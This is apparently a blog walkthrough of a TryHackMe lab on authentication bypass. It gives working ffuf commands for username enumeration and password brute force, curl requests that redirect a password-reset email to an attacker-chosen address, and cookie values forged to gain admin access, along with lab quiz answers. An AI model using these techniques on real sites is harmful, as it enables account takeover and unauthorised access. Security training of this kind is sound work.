Web Fundamentals | Authentication Bypass
Hi there, I’m glad to see you here. In this article, we’ll examine together the “Authentication Bypass” room in TryHackMe. In some sections, I’ll share brief about the subject. Don’t forget! You must always research to learn more. I hope it will be helpful for you. Let’s start!
Contents:
- What is “Authentication Bypass” ?
- Username Enumeration
- Brute Force
- Logic Flaw
- Cookie Tampering
What is “Authentication Bypass” ?
An attacker gains access to application, service, or device with the privileges of an authorized or privileged user by evading or circumventing an authentication mechanism. The attacker is therefore able to access protected data without authentication ever having taken place.
This refers to an attacker gaining access equivalent to an authenticated user without ever going through an authentication procedure. This is usually the result of the attacker using an unexpected access procedure that does not go through the proper checkpoints where authentication should occur.
Username Enumeration
Website error messages are great resources to build list of valid usernames.
When we access the customer portal, we are asked for some information in order to register. Let’s enter the “admin” username and fill in the rest of the required information.
As a result, you’ll see we get the error “An account with this username already exists”.
We can use this error message to produce a list of valid usernames already signed up on the system by using the ffuf tool.
ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.176.6/customers/signup -mr "An account with this username already exists" -cTo get the wordlist, go to the GitHub repository via the link below:
According to our wordlist, we can see that there are 3 different users registered on the system, and an HTTP 200 (OK) response code is returned for each of them.
Answer the questions below
❓Q1: What is the username starting with si*** ?
📣A1: simon
❓Q2: What is the username starting with st*** ?
📣A2: steve
❓Q3: What is the username starting with ro**** ?
📣A3: robert
Brute Force
A brute force attack is an automated process that tries a list of commonly used passwords against either a single username or, like in our case, a list of usernames.
When we access the login page, we are asked to enter username and password information as usual.
At this stage, we can try to perform a brute force attack by creating a wordlist containing the usernames we discovered in the previous step.
And then we can use the ffuf tool to find the passwords that correspond to the usernames.
ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.176.6/customers/login -fc 200 -c
BINGO! As a result of this, we found the password of the user named “steve”.
Answer the questions below
❓Q1: What is the valid username and password (format: username/password)?
📣A1: steve/*******
Logic Flaw
Sometimes authentication processes contain logic flaws. A logic flaw is when the typical logical path of an application is either bypassed, circumvented or manipulated by a hacker.
Let’s look at how we can use this method to reset a user’s password.
We require an email address for the password reset process and when we enter any email address, you’ll see we get the error “Account not found from supplied email address”.
After this stage, we’ll continue on our way by using the email address of one of the users we discovered, robert.
Let’s enter robert as the username and then click the “Check Username” button.
As a result of this, we’ll be presented with a confirmation message that a password reset email will be sent to “robert@acmeitsupport.thm”.
In the second step of the reset email process, the username is submitted in a POST field to the web server, and the email address is sent in the query string request as a GET field.
As a result of the operation we’ve performed on the web page, let’s apply the same operation via the curl command using the URL address and examine the response.
curl 'http://10.10.176.6/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert'
# -H : Header
# -d : HTTP POST dataAs you can see, a reset email has been sent to the email address “robert@acmeitsupport.thm”.
So, can we send a reset email to a different email address using the “robert” username? Let’s try it and see what happens!
curl 'http://10.10.176.6/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email=attacker@hacker.com'
# -H : Header
# -d : HTTP POST dataPerfect! This means that we can redirect the reset email to any email address we want.
First of all, we can begin by creating a user on the system.
And then instead of sending the reset email to Robert’s email address, let’s redirect it to the email address of the user we created.
❗️The email address is in the format of:
👉🏼{username}@customer.acmeitsupport.thm
curl 'http://10.10.176.6/customers/reset?email=robert@acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email=test@customer.acmeitsupport.thm'
# -H : Header
# -d : HTTP POST data
Here it is! 😈
When we examine the ticket titled “Password Reset”, we can see a URL that allows us to automatically login to Robert’s account and then change his password from the “Your Account” page.
This secret must stay between the two of us, my friend!🤫
Answer the questions below
❓Q1: What is the flag from Robert’s support ticket?
📣A1: ***{********************}
Cookie Tampering
Cookies are small files of information that a web server generates and sends to a web browser. Web browsers store the cookies they receive for a predetermined period of time, or for the length of a user’s session on a website.
Plain Text
The contents of some cookies can be in plain text, and it is obvious what they do. Take, for example, if these were the cookie set after a successful login:
Request : curl http://10.10.176.6/cookie-test
Response : Not Logged In
Request : curl -H "Cookie: logged_in=true; admin=false" http://10.10.176.6/cookie-test
Response : Logged In As A User
Request : curl -H "Cookie: logged_in=true; admin=true" http://10.10.176.6/cookie-test
Response : Logged In As An AdminWe see one cookie (logged_in), which appears to control whether the user is currently logged in or not, and another (admin), which controls whether the visitor has admin privileges. Using this logic, if we were to change the contents of the cookies and make a request we’ll be able to change our privileges.
Answer the questions below
❓Q1: What is the flag from changing the plain text cookie values?
📣A1: ***{****************}
Hashing
Sometimes cookie values can look like a long string of random characters; these are called hashes which are an irreversible representation of the original text. Here are some examples that you may come across:
👉🏼Original String : admin
🔑MD5
21232f297a57a5a743894a0e4a801fc3
🔑SHA-256 8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918
🔑SHA-512
c7ad44cbad762a5da0a452f9e854fdc1e0e7a52a38015f23f3eab1d80b931dd472634dfac71cd34ebc35d16ab7fb8a90c81f975113d6c7538dc69dd8de9077ec
🔑SHA-1
d033e22ae348aeb5660fc2140aec35850c4da997
You can see above that the hash output from the same input string can significantly differ depending on the hash method in use. Even though the hash is irreversible, the same output is produced every time, which is helpful for us as services such as https://crackstation.net keep databases of billions of hashes and their original strings.
❓Q2: What is the value of the md5 hash 3b2a1053e3270077456a79192070aa78 ?
📣A2: 463729
Encoding
Encoding is similar to hashing in that it creates what would seem to be a random string of text, but in fact, the encoding is reversible. So it begs the question, what is the point in encoding? Encoding allows us to convert binary data into human-readable text that can be easily and safely transmitted over mediums that only support plain text ASCII characters.
Common encoding types are base32 which converts binary data to the characters A-Z and 2–7, and base64 which converts using the characters a-z, A-Z, 0–9, +, / and the equals sign for padding.
Take the below data as an example which is set by the web server upon logging in:
Set-Cookie: session=eyJpZCI6MSwiYWRtaW4iOmZhbHNlfQ==; Max-Age=3600; Path=/This string base64 decoded has the value of {“id”:1,”admin”: false} we can then encode this back to base64 encoded again but instead setting the admin value to true, which now gives us admin access.
❓Q3: What is the base64 decoded value of VEhNe0JBU0U2NF9FTkNPRElOR30= ?
📣A3: ***{***************}
❓Q4: Encode the following value using base64 {“id”:1,”admin”:true}
📣A4: eyJpZCI6MSwiYWRtaW4iOnRydWV9
Congratulations! We basically learned together how to exploit the “Authentication Bypass” vulnerability, which is one of the web application vulnerabilities. 👊🏻
Thank you for your time. See you soon! Until that time.. Happy Hacking ❤
Resources:
https://capec.mitre.org/data/definitions/115.html
https://www.cloudflare.com/learning/privacy/what-are-cookies
